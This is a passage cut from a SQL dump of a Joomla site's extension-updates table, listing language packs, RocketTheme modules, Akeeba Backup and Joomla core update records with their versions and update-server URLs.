US','','pkg_en-US','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(25279,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(25280,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(25281,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(25282,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(25283,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(25284,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(25285,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(25286,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(25287,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(25288,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(25289,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(25290,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(25291,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(25292,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(25293,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(25294,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(25295,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(25296,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(25297,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(25298,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(25299,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(25300,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(25301,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(25302,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(25303,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(25304,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(25305,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(25306,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(25307,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(25308,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(25309,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(25310,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(25311,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(25312,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(25313,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(25314,57,0,'French','','pkg_fr-FR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(25315,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(25316,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(25317,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(25318,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(25319,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(25320,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(25321,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(25322,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(25323,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(25324,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(25325,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(25326,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(25327,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(25328,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(25329,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(25330,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(25331,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(25332,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(25333,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(25334,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(25335,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(25336,57,0,'English US','','pkg_en-US','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(25337,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(25338,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(25339,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(25340,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(25341,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(25342,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(25343,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(25344,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(25345,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(25346,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(25347,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(25348,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(25349,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(25350,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(25351,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(25352,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(25353,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(25354,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(25355,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(25356,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(25357,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(25358,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(25359,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(25360,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(25361,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.0','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-0.html',''),(25362,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer/features',''),(25363,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(25364,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25365,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25366,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(25367,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25368,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25369,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25370,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25371,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(25372,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25373,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25374,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25375,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(25376,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25377,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25378,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25379,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(25380,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25381,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25382,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25383,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(25384,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25385,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25386,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(25387,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25388,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25389,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25390,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(25391,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25392,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25393,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25394,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(25395,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25396,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(25397,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25398,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25399,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25400,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25401,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.4.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-4-0-1.html',''),(25402,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25403,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25404,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25405,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25406,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.4.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-4-0-1.html',''),(25407,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25408,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25409,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25410,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.4.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-4-0-1.html',''),(25411,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25412,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25413,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25414,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.4.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-4-0-1.html',''),(25415,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25416,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25417,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25418,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25419,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.4.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-4-0-1.html',''),(25420,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25421,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.4.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-4-0-1.html',''),(25422,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25423,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25424,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25425,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.4.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-4-0-1.html',''),(25426,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25427,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25428,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25429,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.4.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-4-0-1.html',''),(25430,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25431,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25432,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25433,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25434,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.4.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-4-0-1.html',''),(25435,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25436,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25437,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.4.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-4-0-1.html',''),(25438,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25439,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25440,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25441,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25442,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.4.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-4-0-1.html',''),(25443,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25444,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25445,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.4.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-4-0-1.html',''),(25446,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25447,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25448,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.4.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-4-0-1.html',''),(25449,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25450,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25451,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25452,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.4.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-4-0-1.html',''),(25453,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25454,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25455,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25456,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.4.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-4-0-1.html',''),(25457,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25458,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25459,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25460,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.4.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-4-0-1.html',''),(25461,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25462,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.4.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-4-0-1.html',''),(25463,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25464,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25465,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.4.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-4-0-1.html',''),(25466,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25467,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25468,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.4.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-4-0-1.html',''),(25469,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25470,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25471,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25472,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.4.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-4-0-1.html',''),(25473,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25474,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25475,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25476,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-0.html',''),(25477,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25478,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25479,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-0-1.html',''),(25480,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25481,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(25482,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(25483,3,0,'French','','pkg_fr-FR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(25484,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(25485,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(25486,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(25487,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(25488,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(25489,3,0,'Arabic 